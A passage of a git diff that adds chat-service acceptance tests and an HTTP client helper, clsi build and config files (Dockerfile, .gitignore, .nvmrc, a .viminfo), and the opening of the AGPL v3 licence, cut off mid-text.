expect(response.statusCode).to.equal(200) + expect(threads[threadId].messages.length).to.equal(1) + expect(threads[threadId].messages[0].content).to.equal(content) + }) + }) + }) +}) diff --git a/services/chat/test/acceptance/js/GettingMessagesTests.js b/services/chat/test/acceptance/js/GettingMessagesTests.js new file mode 100644 index 0000000..4fb20da --- /dev/null +++ b/services/chat/test/acceptance/js/GettingMessagesTests.js @@ -0,0 +1,164 @@ +import { ObjectId } from '../../../app/js/mongodb.js' +import { expect } from 'chai' + +import * as ChatClient from './helpers/ChatClient.js' +import * as ChatApp from './helpers/ChatApp.js' + +async function getCount() { + return await ChatClient.getMetric(line => { + return ( + line.includes('timer_http_request_count') && + line.includes('path="project_{projectId}_messages"') && + line.includes('method="POST"') + ) + }) +} + +describe('Getting messages', async function () { + const userId1 = new ObjectId().toString() + const userId2 = new ObjectId().toString() + const content1 = 'foo bar' + const content2 = 'hello world' + before(async function () { + await ChatApp.ensureRunning() + }) + + describe('globally', async function () { + const projectId = new ObjectId().toString() + before(async function () { + const previousCount = await getCount() + const { response } = await ChatClient.sendGlobalMessage( + projectId, + userId1, + content1 + ) + expect(response.statusCode).to.equal(201) + const { response: response2 } = await ChatClient.sendGlobalMessage( + projectId, + userId2, + content2 + ) + expect(response2.statusCode).to.equal(201) + const { response: response3, body } = await ChatClient.checkStatus() + expect(response3.statusCode).to.equal(200) + expect(body).to.equal('chat is alive') + expect(await getCount()).to.equal(previousCount + 2) + }) + + it('should contain the messages and populated users when getting the messages', async function () { + const { response, body: messages } = + await ChatClient.getGlobalMessages(projectId) + expect(response.statusCode).to.equal(200) + expect(messages.length).to.equal(2) + messages.reverse() + expect(messages[0].content).to.equal(content1) + expect(messages[0].user_id).to.equal(userId1) + expect(messages[1].content).to.equal(content2) + expect(messages[1].user_id).to.equal(userId2) + }) + }) + + describe('from all the threads', async function () { + const projectId = new ObjectId().toString() + const threadId1 = new ObjectId().toString() + const threadId2 = new ObjectId().toString() + + before(async function () { + const { response } = await ChatClient.sendMessage( + projectId, + threadId1, + userId1, + 'one' + ) + expect(response.statusCode).to.equal(201) + const { response: response2 } = await ChatClient.sendMessage( + projectId, + threadId2, + userId2, + 'two' + ) + expect(response2.statusCode).to.equal(201) + const { response: response3 } = await ChatClient.sendMessage( + projectId, + threadId1, + userId1, + 'three' + ) + expect(response3.statusCode).to.equal(201) + const { response: response4 } = await ChatClient.sendMessage( + projectId, + threadId2, + userId2, + 'four' + ) + expect(response4.statusCode).to.equal(201) + }) + + it('should contain a dictionary of threads with messages with populated users', async function () { + const { response, body: threads } = await ChatClient.getThreads(projectId) + expect(response.statusCode).to.equal(200) + expect(Object.keys(threads).length).to.equal(2) + const thread1 = threads[threadId1] + expect(thread1.messages.length).to.equal(2) + const thread2 = 
threads[threadId2] + expect(thread2.messages.length).to.equal(2) + + expect(thread1.messages[0].content).to.equal('one') + expect(thread1.messages[0].user_id).to.equal(userId1) + expect(thread1.messages[1].content).to.equal('three') + expect(thread1.messages[1].user_id).to.equal(userId1) + + expect(thread2.messages[0].content).to.equal('two') + expect(thread2.messages[0].user_id).to.equal(userId2) + expect(thread2.messages[1].content).to.equal('four') + expect(thread2.messages[1].user_id).to.equal(userId2) + }) + }) + + describe('from a list of threads', function () { + const projectId = new ObjectId().toString() + const threadId1 = new ObjectId().toString() + const threadId2 = new ObjectId().toString() + const threadId3 = new ObjectId().toString() + + before(async function () { + const { response } = await ChatClient.sendMessage( + projectId, + threadId1, + userId1, + 'one' + ) + expect(response.statusCode).to.equal(201) + const { response: response2 } = await ChatClient.sendMessage( + projectId, + threadId2, + userId2, + 'two' + ) + expect(response2.statusCode).to.equal(201) + const { response: response3 } = await ChatClient.sendMessage( + projectId, + threadId1, + userId1, + 'three' + ) + expect(response3.statusCode).to.equal(201) + }) + + it('should contain a dictionary of threads with messages with populated users', async function () { + const { response, body: threads } = await ChatClient.generateThreadData( + projectId, + [threadId1, threadId3] + ) + expect(response.statusCode).to.equal(200) + expect(Object.keys(threads).length).to.equal(1) + const thread1 = threads[threadId1] + expect(thread1.messages.length).to.equal(2) + + expect(thread1.messages[0].content).to.equal('one') + expect(thread1.messages[0].user_id).to.equal(userId1) + expect(thread1.messages[1].content).to.equal('three') + expect(thread1.messages[1].user_id).to.equal(userId1) + }) + }) +}) diff --git a/services/chat/test/acceptance/js/ResolvingAThreadTests.js b/services/chat/test/acceptance/js/ResolvingAThreadTests.js new file mode 100644 index 0000000..208d232 --- /dev/null +++ b/services/chat/test/acceptance/js/ResolvingAThreadTests.js @@ -0,0 +1,114 @@ +import { ObjectId } from '../../../app/js/mongodb.js' +import { expect } from 'chai' + +import * as ChatClient from './helpers/ChatClient.js' +import * as ChatApp from './helpers/ChatApp.js' + +describe('Resolving a thread', async function () { + const projectId = new ObjectId().toString() + const userId = new ObjectId().toString() + before(async function () { + await ChatApp.ensureRunning() + }) + + describe('with a resolved thread', async function () { + const threadId = new ObjectId().toString() + const content = 'resolved message' + before(async function () { + const { response } = await ChatClient.sendMessage( + projectId, + threadId, + userId, + content + ) + expect(response.statusCode).to.equal(201) + const { response: response2 } = await ChatClient.resolveThread( + projectId, + threadId, + userId + ) + expect(response2.statusCode).to.equal(204) + }) + + it('should then list the thread as resolved', async function () { + const { response, body: threads } = await ChatClient.getThreads(projectId) + expect(response.statusCode).to.equal(200) + expect(threads[threadId].resolved).to.equal(true) + expect(threads[threadId].resolved_by_user_id).to.equal(userId) + const resolvedAt = new Date(threads[threadId].resolved_at) + expect(new Date() - resolvedAt).to.be.below(1000) + }) + + it('should list the thread id in the resolved thread ids endpoint', async function () { 
+ const { response, body } = + await ChatClient.getResolvedThreadIds(projectId) + expect(response.statusCode).to.equal(200) + expect(body.resolvedThreadIds).to.include(threadId) + }) + }) + + describe('when a thread is not resolved', async function () { + const threadId = new ObjectId().toString() + const content = 'open message' + before(async function () { + const { response } = await ChatClient.sendMessage( + projectId, + threadId, + userId, + content + ) + expect(response.statusCode).to.equal(201) + }) + + it('should not list the thread as resolved', async function () { + const { response, body: threads } = await ChatClient.getThreads(projectId) + expect(response.statusCode).to.equal(200) + expect(threads[threadId].resolved).to.be.undefined + }) + + it('should not list the thread in the resolved thread ids endpoint', async function () { + const { response, body } = + await ChatClient.getResolvedThreadIds(projectId) + expect(response.statusCode).to.equal(200) + expect(body.resolvedThreadIds).not.to.include(threadId) + }) + }) + + describe('when a thread is resolved then reopened', async function () { + const threadId = new ObjectId().toString() + const content = 'resolved message' + before(async function () { + const { response } = await ChatClient.sendMessage( + projectId, + threadId, + userId, + content + ) + expect(response.statusCode).to.equal(201) + const { response: response2 } = await ChatClient.resolveThread( + projectId, + threadId, + userId + ) + expect(response2.statusCode).to.equal(204) + const { response: response3 } = await ChatClient.reopenThread( + projectId, + threadId + ) + expect(response3.statusCode).to.equal(204) + }) + + it('should not list the thread as resolved', async function () { + const { response, body: threads } = await ChatClient.getThreads(projectId) + expect(response.statusCode).to.equal(200) + expect(threads[threadId].resolved).to.be.undefined + }) + + it('should not list the thread in the resolved thread ids endpoint', async function () { + const { response, body } = + await ChatClient.getResolvedThreadIds(projectId) + expect(response.statusCode).to.equal(200) + expect(body.resolvedThreadIds).not.to.include(threadId) + }) + }) +}) diff --git a/services/chat/test/acceptance/js/SendingAMessageTests.js b/services/chat/test/acceptance/js/SendingAMessageTests.js new file mode 100644 index 0000000..7dbc1df --- /dev/null +++ b/services/chat/test/acceptance/js/SendingAMessageTests.js @@ -0,0 +1,143 @@ +import { ObjectId } from '../../../app/js/mongodb.js' +import { expect } from 'chai' + +import * as ChatClient from './helpers/ChatClient.js' +import * as ChatApp from './helpers/ChatApp.js' + +describe('Sending a message', async function () { + before(async function () { + await ChatApp.ensureRunning() + }) + + describe('globally', async function () { + const projectId = new ObjectId().toString() + const userId = new ObjectId().toString() + const content = 'global message' + before(async function () { + const { response, body } = await ChatClient.sendGlobalMessage( + projectId, + userId, + content + ) + expect(response.statusCode).to.equal(201) + expect(body.content).to.equal(content) + expect(body.user_id).to.equal(userId) + expect(body.room_id).to.equal(projectId) + }) + + it('should then list the message in the project messages', async function () { + const { response, body: messages } = + await ChatClient.getGlobalMessages(projectId) + expect(response.statusCode).to.equal(200) + expect(messages.length).to.equal(1) + 
expect(messages[0].content).to.equal(content)
+    })
+  })
+
+  describe('to a thread', async function () {
+    const projectId = new ObjectId().toString()
+    const userId = new ObjectId().toString()
+    const threadId = new ObjectId().toString()
+    const content = 'thread message'
+    before(async function () {
+      const { response, body } = await ChatClient.sendMessage(
+        projectId,
+        threadId,
+        userId,
+        content
+      )
+      expect(response.statusCode).to.equal(201)
+      expect(body.content).to.equal(content)
+      expect(body.user_id).to.equal(userId)
+      expect(body.room_id).to.equal(projectId)
+    })
+
+    it('should then list the message in the threads', async function () {
+      const { response, body: threads } = await ChatClient.getThreads(projectId)
+      expect(response.statusCode).to.equal(200)
+      expect(threads[threadId].messages.length).to.equal(1)
+      expect(threads[threadId].messages[0].content).to.equal(content)
+    })
+
+    it('should not appear in the global messages', async function () {
+      const { response, body: messages } =
+        await ChatClient.getGlobalMessages(projectId)
+      expect(response.statusCode).to.equal(200)
+      expect(messages.length).to.equal(0)
+    })
+  })
+
+  describe('failure cases', async function () {
+    const projectId = new ObjectId().toString()
+    const userId = new ObjectId().toString()
+    const threadId = new ObjectId().toString()
+
+    describe('with a malformed userId', async function () {
+      it('should return a graceful error', async function () {
+        const { response, body } = await ChatClient.sendMessage(
+          projectId,
+          threadId,
+          'malformed-user',
+          'content'
+        )
+        expect(response.statusCode).to.equal(400)
+        expect(body).to.equal('Invalid userId')
+      })
+    })
+
+    describe('with a malformed projectId', async function () {
+      it('should return a graceful error', async function () {
+        const { response, body } = await ChatClient.sendMessage(
+          'malformed-project',
+          threadId,
+          userId,
+          'content'
+        )
+        expect(response.statusCode).to.equal(400)
+        expect(body).to.equal('Invalid projectId')
+      })
+    })
+
+    describe('with a malformed threadId', async function () {
+      it('should return a graceful error', async function () {
+        const { response, body } = await ChatClient.sendMessage(
+          projectId,
+          'malformed-thread-id',
+          userId,
+          'content'
+        )
+        expect(response.statusCode).to.equal(400)
+        expect(body).to.equal('Invalid threadId')
+      })
+    })
+
+    describe('with no content', async function () {
+      it('should return a graceful error', async function () {
+        const { response, body } = await ChatClient.sendMessage(
+          projectId,
+          threadId,
+          userId,
+          null
+        )
+        expect(response.statusCode).to.equal(400)
+        // Exegesis is responding with validation errors. I can't find a way to choose the validation error yet.
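+        // Note: the Message schema in chat.yaml marks content as required, so
+        // exegesis rejects a null content before the controller runs; the
+        // handler's own 'No content provided' branch is presumably only
+        // reachable for values that pass schema validation, such as an empty
+        // string.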
+ // expect(body).to.equal('No content provided') + expect(body.message).to.equal('Validation errors') + }) + }) + + describe('with very long content', async function () { + it('should return a graceful error', async function () { + const content = '-'.repeat(10 * 1024 + 1) + const { response, body } = await ChatClient.sendMessage( + projectId, + threadId, + userId, + content + ) + expect(response.statusCode).to.equal(400) + expect(body).to.equal('Content too long (> 10240 bytes)') + }) + }) + }) +}) diff --git a/services/chat/test/acceptance/js/helpers/ChatApp.js b/services/chat/test/acceptance/js/helpers/ChatApp.js new file mode 100644 index 0000000..3a0baf5 --- /dev/null +++ b/services/chat/test/acceptance/js/helpers/ChatApp.js @@ -0,0 +1,15 @@ +import { createServer } from '../../../../app/js/server.js' +import { promisify } from 'node:util' + +export { db } from '../../../../app/js/mongodb.js' + +let serverPromise = null + +export async function ensureRunning() { + if (!serverPromise) { + const { app } = await createServer() + const startServer = promisify(app.listen.bind(app)) + serverPromise = startServer(3010, '127.0.0.1') + } + return serverPromise +} diff --git a/services/chat/test/acceptance/js/helpers/ChatClient.js b/services/chat/test/acceptance/js/helpers/ChatClient.js new file mode 100644 index 0000000..6a8196d --- /dev/null +++ b/services/chat/test/acceptance/js/helpers/ChatClient.js @@ -0,0 +1,166 @@ +import Request from 'request' + +const request = Request.defaults({ + baseUrl: 'http://127.0.0.1:3010', +}) + +async function asyncRequest(options) { + return await new Promise((resolve, reject) => { + request(options, (err, response, body) => { + if (err) { + reject(err) + } else { + resolve({ response, body }) + } + }) + }) +} + +export async function sendGlobalMessage(projectId, userId, content) { + return await asyncRequest({ + method: 'post', + url: `/project/${projectId}/messages`, + json: { + user_id: userId, + content, + }, + }) +} + +export async function getGlobalMessages(projectId) { + return await asyncRequest({ + method: 'get', + url: `/project/${projectId}/messages`, + json: true, + }) +} + +export async function sendMessage(projectId, threadId, userId, content) { + return await asyncRequest({ + method: 'post', + url: `/project/${projectId}/thread/${threadId}/messages`, + json: { + user_id: userId, + content, + }, + }) +} + +export async function getThreads(projectId) { + return await asyncRequest({ + method: 'get', + url: `/project/${projectId}/threads`, + json: true, + }) +} + +export async function resolveThread(projectId, threadId, userId) { + return await asyncRequest({ + method: 'post', + url: `/project/${projectId}/thread/${threadId}/resolve`, + json: { + user_id: userId, + }, + }) +} + +export async function getResolvedThreadIds(projectId) { + return await asyncRequest({ + method: 'get', + url: `/project/${projectId}/resolved-thread-ids`, + json: true, + }) +} + +export async function editMessage(projectId, threadId, messageId, content) { + return await asyncRequest({ + method: 'post', + url: `/project/${projectId}/thread/${threadId}/messages/${messageId}/edit`, + json: { + content, + }, + }) +} + +export async function editMessageWithUser( + projectId, + threadId, + messageId, + userId, + content +) { + return await asyncRequest({ + method: 'post', + url: `/project/${projectId}/thread/${threadId}/messages/${messageId}/edit`, + json: { + content, + userId, + }, + }) +} + +export async function checkStatus() { + return await asyncRequest({ + method: 
'get', + url: `/status`, + json: true, + }) +} + +export async function getMetric(matcher) { + const { body } = await asyncRequest({ + method: 'get', + url: `/metrics`, + }) + const found = body.split('\n').find(matcher) + if (!found) return 0 + return parseInt(found.split(' ')[1], 0) +} + +export async function reopenThread(projectId, threadId) { + return await asyncRequest({ + method: 'post', + url: `/project/${projectId}/thread/${threadId}/reopen`, + }) +} + +export async function deleteThread(projectId, threadId) { + return await asyncRequest({ + method: 'delete', + url: `/project/${projectId}/thread/${threadId}`, + }) +} + +export async function deleteMessage(projectId, threadId, messageId) { + return await asyncRequest({ + method: 'delete', + url: `/project/${projectId}/thread/${threadId}/messages/${messageId}`, + }) +} + +export async function destroyProject(projectId) { + return await asyncRequest({ + method: 'delete', + url: `/project/${projectId}`, + }) +} + +export async function duplicateCommentThreads(projectId, threads) { + return await asyncRequest({ + method: 'post', + url: `/project/${projectId}/duplicate-comment-threads`, + json: { + threads, + }, + }) +} + +export async function generateThreadData(projectId, threads) { + return await asyncRequest({ + method: 'post', + url: `/project/${projectId}/generate-thread-data`, + json: { + threads, + }, + }) +} diff --git a/services/chat/test/setup.js b/services/chat/test/setup.js new file mode 100644 index 0000000..d61deff --- /dev/null +++ b/services/chat/test/setup.js @@ -0,0 +1,9 @@ +import chai from 'chai' +import chaiAsPromised from 'chai-as-promised' +import { ObjectId } from 'mongodb' + +// ensure every ObjectId has the id string as a property for correct comparisons +ObjectId.cacheHexString = true + +chai.should() +chai.use(chaiAsPromised) diff --git a/services/chat/tsconfig.json b/services/chat/tsconfig.json new file mode 100644 index 0000000..d3fdd30 --- /dev/null +++ b/services/chat/tsconfig.json @@ -0,0 +1,12 @@ +{ + "extends": "../../tsconfig.backend.json", + "include": [ + "app.js", + "app/js/**/*", + "benchmarks/**/*", + "config/**/*", + "scripts/**/*", + "test/**/*", + "types" + ] +} diff --git a/services/clsi/.gitignore b/services/clsi/.gitignore new file mode 100644 index 0000000..3604662 --- /dev/null +++ b/services/clsi/.gitignore @@ -0,0 +1,14 @@ +**.swp +node_modules +test/acceptance/fixtures/tmp +compiles +output +.DS_Store +*~ +cache +.vagrant +config/* +npm-debug.log + +# managed by dev-environment$ bin/update_build_scripts +.npmrc diff --git a/services/clsi/.mocharc.json b/services/clsi/.mocharc.json new file mode 100644 index 0000000..dc3280a --- /dev/null +++ b/services/clsi/.mocharc.json @@ -0,0 +1,3 @@ +{ + "require": "test/setup.js" +} diff --git a/services/clsi/.nvmrc b/services/clsi/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/services/clsi/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/services/clsi/.viminfo b/services/clsi/.viminfo new file mode 100644 index 0000000..78c0129 --- /dev/null +++ b/services/clsi/.viminfo @@ -0,0 +1,35 @@ +# This viminfo file was generated by Vim 7.4. +# You may edit it if you're careful! 
+ +# Value of 'encoding' when this file was written +*encoding=latin1 + + +# hlsearch on (H) or off (h): +~h +# Command Line History (newest to oldest): +:x + +# Search String History (newest to oldest): + +# Expression History (newest to oldest): + +# Input Line History (newest to oldest): + +# Input Line History (newest to oldest): + +# Registers: + +# File marks: +'0 1 0 ~/hello + +# Jumplist (newest first): +-' 1 0 ~/hello + +# History of marks within files (newest to oldest): + +> ~/hello + " 1 0 + ^ 1 1 + . 1 0 + + 1 0 diff --git a/services/clsi/Dockerfile b/services/clsi/Dockerfile new file mode 100644 index 0000000..c5f46c1 --- /dev/null +++ b/services/clsi/Dockerfile @@ -0,0 +1,32 @@ +# This file was auto-generated, do not edit it directly. +# Instead run bin/update_build_scripts from +# https://github.com/overleaf/internal/ + +FROM node:20.18.2 AS base + +WORKDIR /overleaf/services/clsi +COPY services/clsi/install_deps.sh /overleaf/services/clsi/ +RUN chmod 0755 ./install_deps.sh && ./install_deps.sh +ENTRYPOINT ["/bin/sh", "/entrypoint.sh"] +COPY services/clsi/entrypoint.sh / + +# Google Cloud Storage needs a writable $HOME/.config for resumable uploads +# (see https://googleapis.dev/nodejs/storage/latest/File.html#createWriteStream) +RUN mkdir /home/node/.config && chown node:node /home/node/.config + +FROM base AS app + +COPY package.json package-lock.json /overleaf/ +COPY services/clsi/package.json /overleaf/services/clsi/ +COPY libraries/ /overleaf/libraries/ +COPY patches/ /overleaf/patches/ + +RUN cd /overleaf && npm ci --quiet + +COPY services/clsi/ /overleaf/services/clsi/ + +FROM app +RUN mkdir -p cache compiles output \ +&& chown node:node cache compiles output + +CMD ["node", "--expose-gc", "app.js"] diff --git a/services/clsi/LICENSE b/services/clsi/LICENSE new file mode 100644 index 0000000..dba13ed --- /dev/null +++ b/services/clsi/LICENSE @@ -0,0 +1,661 @@ + GNU AFFERO GENERAL PUBLIC LICENSE + Version 3, 19 November 2007 + + Copyright (C) 2007 Free Software Foundation, Inc. + Everyone is permitted to copy and distribute verbatim copies + of this license document, but changing it is not allowed. + + Preamble + + The GNU Affero General Public License is a free, copyleft license for +software and other kinds of works, specifically designed to ensure +cooperation with the community in the case of network server software. + + The licenses for most software and other practical works are designed +to take away your freedom to share and change the works. By contrast, +our General Public Licenses are intended to guarantee your freedom to +share and change all versions of a program--to make sure it remains free +software for all its users. + + When we speak of free software, we are referring to freedom, not +price. Our General Public Licenses are designed to make sure that you +have the freedom to distribute copies of free software (and charge for +them if you wish), that you receive source code or can get it if you +want it, that you can change the software or use pieces of it in new +free programs, and that you know you can do these things. + + Developers that use our General Public Licenses protect your rights +with two steps: (1) assert copyright on the software, and (2) offer +you this License which gives you legal permission to copy, distribute +and/or modify the software. 
+ + A secondary benefit of defending all users' freedom is that +improvements made in alternate versions of the program, if they +receive widespread use, become available for other developers to +incorporate. Many developers of free software are heartened and +encouraged by the resulting cooperation. However, in the case of +software used on network servers, this result may fail to come about. +The GNU General Public License permits making a modified version and +letting the public access it on a server without ever releasing its +source code to the public. + + The GNU Affero General Public License is designed specifically to +ensure that, in such cases, the modified source code becomes available +to the community. It requires the operator of a network server to +provide the source code of the modified version running there to the +users of that server. Therefore, public use of a modified version, on +a publicly accessible server, gives the public access to the source +code of the modified version. + + An older license, called the Affero General Public License and +published by Affero, was designed to accomplish similar goals. This is +a different license, not a version of the Affero GPL, but Affero has +released a new version of the Affero GPL which permits relicensing under +this license. + + The precise terms and conditions for copying, distribution and +modification follow. + + TERMS AND CONDITIONS + + 0. Definitions. + + "This License" refers to version 3 of the GNU Affero General Public License. + + "Copyright" also means copyright-like laws that apply to other kinds of +works, such as semiconductor masks. + + "The Program" refers to any copyrightable work licensed under this +License. Each licensee is addressed as "you". "Licensees" and +"recipients" may be individuals or organizations. + + To "modify" a work means to copy from or adapt all or part of the work +in a fashion requiring copyright permission, other than the making of an +exact copy. The resulting work is called a "modified version" of the +earlier work or a work "based on" the earlier work. + + A "covered work" means either the unmodified Program or a work based +on the Program. + + To "propagate" a work means to do anything with it that, without +permission, would make you directly or secondarily liable for +infringement under applicable copyright law, except executing it on a +computer or modifying a private copy. Propagation includes copying, +distribution (with or without modification), making available to the +public, and in some countries other activities as well. + + To "convey" a work means any kind of propagation that enables other +parties to make or receive copies. Mere interaction with a user through +a computer network, with no transfer of a copy, is not conveying. + + An interactive user interface displays "Appropriate Legal Notices" +to the extent that it includes a convenient and prominently visible +feature that (1) displays an appropriate copyright notice, and (2) +tells the user that there is no warranty for the work (except to the +extent that warranties are provided), that licensees may convey the +work under this License, and how to view a copy of this License. If +the interface presents a list of user commands or options, such as a +menu, a prominent item in the list meets this criterion. + + 1. Source Code. + + The "source code" for a work means the preferred form of the work +for making modifications to it. "Object code" means any non-source +form of a work. 
+ + A "Standard Interface" means an interface that either is an official +standard defined by a recognized standards body, or, in the case of +interfaces specified for a particular programming language, one that +is widely used among developers working in that language. + + The "System Libraries" of an executable work include anything, other +than the work as a whole, that (a) is included in the normal form of +packaging a Major Component, but which is not part of that Major +Component, and (b) serves only to enable use of the work with that +Major Component, or to implement a Standard Interface for which an +implementation is available to the public in source code form. A +"Major Component", in this context, means a major essential component +(kernel, window system, and so on) of the specific operating system +(if any) on which the executable work runs, or a compiler used to +produce the work, or an object code interpreter used to run it. + + The "Corresponding Source" for a work in object code form means all +the source code needed to generate, install, and (for an executable +work) run the object code and to modify the work, including scripts to +control those activities. However, it does not include the work's +System Libraries, or general-purpose tools or generally available free +programs which are used unmodified in performing those activities but +which are not part of the work. For example, Corresponding Source +includes interface definition files associated with source files for +the work, and the source code for shared libraries and dynamically +linked subprograms that the work is specifically designed to require, +such as by intimate data communication or control flow between those +subprograms and other parts of the work. + + The Corresponding Source need not include anything that users +can regenerate automatically from other parts of the Corresponding +Source. + + The Corresponding Source for a work in source code form is that +same work. + + 2. Basic Permissions. + + All rights granted under this License are granted for the term of +copyright on the Program, and are irrevocable provided the stated +conditions are met. This License explicitly affirms your unlimited +permission to run the unmodified Program. The output from running a +covered work is covered by this License only if the output, given its +content, constitutes a covered work. This License acknowledges your +rights of fair use or other equivalent, as provided by copyright law. + + You may make, run and propagate covered works that you do not +convey, without conditions so long as your license otherwise remains +in force. You may convey covered works to others for the sole purpose +of having them make modifications exclusively for you, or provide you +with facilities for running those works, provided that you comply with +the terms of this License in conveying all material for which you do +not control copyright. Those thus making or running the covered works +for you must do so exclusively on your behalf, under your direction +and control, on terms that prohibit them from making any copies of +your copyrighted material outside their relationship with you. + + Conveying under any other circumstances is permitted solely under +the conditions stated below. Sublicensing is not allowed; section 10 +makes it unnecessary. + + 3. Protecting Users' Legal Rights From Anti-Circumvention Law. 
+ + No covered work shall be deemed part of an effective technological +measure under any applicable law fulfilling obligations under article +11 of the WIPO copyright treaty adopted on 20 December 1996, or +similar laws prohibiting or restricting circumvention of such +measures. + + When you convey a covered work, you waive any legal power to forbid +circumvention of technological measures to the extent such circumvention +is effected by exercising rights under this License with respect to +the covered work, and you disclaim any intention to limit operation or +modification of the work as a means of enforcing, against the work's +users, your or third parties' legal rights to forbid circumvention of +technological measures. + + 4. Conveying Verbatim Copies. + + You may convey verbatim copies of the Program's source code as you +receive it, in any medium, provided that you conspicuously and +appropriately publish on each copy an appropriate copyright notice; +keep intact all notices stating that this License and any +non-permissive terms added in accord with section 7 apply to the code; +keep intact all notices of the absence of any warranty; and give all +recipients a copy of this License along with the Program. + + You may charge any price or no price for each copy that you convey, +and you may offer support or warranty protection for a fee. + + 5. Conveying Modified Source Versions. + + You may convey a work based on the Program, or the modifications to +produce it from the Program, in the form of source code under the +terms of section 4, provided that you also meet all of these conditions: + + a) The work must carry prominent notices stating that you modified + it, and giving a relevant date. + + b) The work must carry prominent notices stating that it is + released under this License and any conditions added under section + 7. This requirement modifies the requirement in section 4 to + "keep intact all notices". + + c) You must license the entire work, as a whole, under this + License to anyone who comes into possession of a copy. This + License will therefore apply, along with any applicable section 7 + additional terms, to the whole of the work, and all its parts, + regardless of how they are packaged. This License gives no + permission to license the work in any other way, but it does not + invalidate such permission if you have separately received it. + + d) If the work has interactive user interfaces, each must display + Appropriate Legal Notices; however, if the Program has interactive + interfaces that do not display Appropriate Legal Notices, your + work need not make them do so. + + A compilation of a covered work with other separate and independent +works, which are not by their nature extensions of the covered work, +and which are not combined with it such as to form a larger program, +in or on a volume of a storage or distribution medium, is called an +"aggregate" if the compilation and its resulting copyright are not +used to limit the access or legal rights of the compilation's users +beyond what the individual works permit. Inclusion of a covered work +in an aggregate does not cause this License to apply to the other +parts of the aggregate. + + 6. Conveying Non-Source Forms. 
+ + You may convey a covered work in object code form under the terms +of sections 4 and 5, provided that you also convey the +machine-readable Corresponding Source under the terms of this License, +in one of these ways: + + a) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by the + Corresponding Source fixed on a durable physical medium + customarily used for software interchange. + + b) Convey the object code in, or embodied in, a physical product + (including a physical distribution medium), accompanied by a + written offer, valid for at least three years and valid for as + long as you offer spare parts or customer support for that product + model, to give anyone who possesses the object code either (1) a + copy of the Corresponding Source for all the software in the + product that is covered by this License, on a durable physical + medium customarily used for software interchange, for a price no + more than your reasonable cost of physically performing this + conveying of source, or (2) access to copy the + Corresponding Source from a network server at no charge. + + c) Convey individual copies of the object code with a copy of the + written offer to provide the Corresponding Source. This + alternative is allowed only occasionally and noncommercially, and + only if you received the object code with such an offer, in accord + with subsection 6b. + + d) Convey the object code by offering access from a designated + place (gratis or for a charge), and offer equivalent access to the + Corresponding Source in the same way through the same place at no + further charge. You need not require recipients to copy the + Corresponding Source along with the object code. If the place to + copy the object code is a network server, the Corresponding Source + may be on a different server (operated by you or a third party) + that supports equivalent copying facilities, provided you maintain + clear directions next to the object code saying where to find the + Corresponding Source. Regardless of what server hosts the + Corresponding Source, you remain obligated to ensure that it is + available for as long as needed to satisfy these requirements. + + e) Convey the object code using peer-to-peer transmission, provided + you inform other peers where the object code and Corresponding + Source of the work are being offered to the general public at no + charge under subsection 6d. + + A separable portion of the object code, whose source code is excluded +from the Corresponding Source as a System Library, need not be +included in conveying the object code work. + + A "User Product" is either (1) a "consumer product", which means any +tangible personal property which is normally used for personal, family, +or household purposes, or (2) anything designed or sold for incorporation +into a dwelling. In determining whether a product is a consumer product, +doubtful cases shall be resolved in favor of coverage. For a particular +product received by a particular user, "normally used" refers to a +typical or common use of that class of product, regardless of the status +of the particular user or of the way in which the particular user +actually uses, or expects or is expected to use, the product. A product +is a consumer product regardless of whether the product has substantial +commercial, industrial or non-consumer uses, unless such uses represent +the only significant mode of use of the product. 
+ + "Installation Information" for a User Product means any methods, +procedures, authorization keys, or other information required to install +and execute modified versions of a covered work in that User Product from +a modified version of its Corresponding Source. The information must +suffice to ensure that the continued functioning of the modified object +code is in no case prevented or interfered with solely because +modification has been made. + + If you convey an object code work under this section in, or with, or +specifically for use in, a User Product, and the conveying occurs as +part of a transaction in which the right of possession and use of the +User Product is transferred to the recipient in perpetuity or for a +fixed term (regardless of how the transaction is characterized), the +Corresponding Source conveyed under this section must be accompanied +by the Installation Information. But this requirement does not apply +if neither you nor any third party retains the ability to install +modified object code on the User Product (for example, the work has +been installed in ROM). + + The requirement to provide Installation Information does not include a +requirement to continue to provide support service, warranty, or updates +for a work that has been modified or installed by the recipient, or for +the User Product in which it has been modified or installed. Access to a +network may be denied when the modification itself materially and +adversely affects the operation of the network or violates the rules and +protocols for communication across the network. + + Corresponding Source conveyed, and Installation Information provided, +in accord with this section must be in a format that is publicly +documented (and with an implementation available to the public in +source code form), and must require no special password or key for +unpacking, reading or copying. + + 7. Additional Terms. + + "Additional permissions" are terms that supplement the terms of this +License by making exceptions from one or more of its conditions. +Additional permissions that are applicable to the entire Program shall +be treated as though they were included in this License, to the extent +that they are valid under applicable law. If additional permissions +apply only to part of the Program, that part may be used separately +under those permissions, but the entire Program remains governed by +this License without regard to the additional permissions. + + When you convey a copy of a covered work, you may at your option +remove any additional permissions from that copy, or from any part of +it. (Additional permissions may be written to require their own +removal in certain cases when you modify the work.) You may place +additional permissions on material, added by you to a covered work, +for which you have or can give appropriate copyright permission. 
+ + Notwithstanding any other provision of this License, for material you +add to a covered work, you may (if authorized by the copyright holders of +that material) supplement the terms of this License with terms: + + a) Disclaiming warranty or limiting liability differently from the + terms of sections 15 and 16 of this License; or + + b) Requiring preservation of specified reasonable legal notices or + author attributions in that material or in the Appropriate Legal + Notices displayed by works containing it; or + + c) Prohibiting misrepresentation of the origin of that material, or + requiring that modified versions of such material be marked in + reasonable ways as different from the original version; or + + d) Limiting the use for publicity purposes of names of licensors or + authors of the material; or + + e) Declining to grant rights under trademark law for use of some + trade names, trademarks, or service marks; or + + f) Requiring indemnification of licensors and authors of that + material by anyone who conveys the material (or modified versions of + it) with contractual assumptions of liability to the recipient, for + any liability that these contractual assumptions directly impose on + those licensors and authors. + + All other non-permissive additional terms are considered "further +restrictions" within the meaning of section 10. If the Program as you +received it, or any part of it, contains a notice stating that it is +governed by this License along with a term that is a further +restriction, you may remove that term. If a license document contains +a further restriction but permits relicensing or conveying under this +License, you may add to a covered work material governed by the terms +of that license document, provided that the further restriction does +not survive such relicensing or conveying. + + If you add terms to a covered work in accord with this section, you +must place, in the relevant source files, a statement of the +additional terms that apply to those files, or a notice indicating +where to find the applicable terms. + + Additional terms, permissive or non-permissive, may be stated in the +form of a separately written license, or stated as exceptions; +the above requirements apply either way. + + 8. Termination. + + You may not propagate or modify a covered work except as 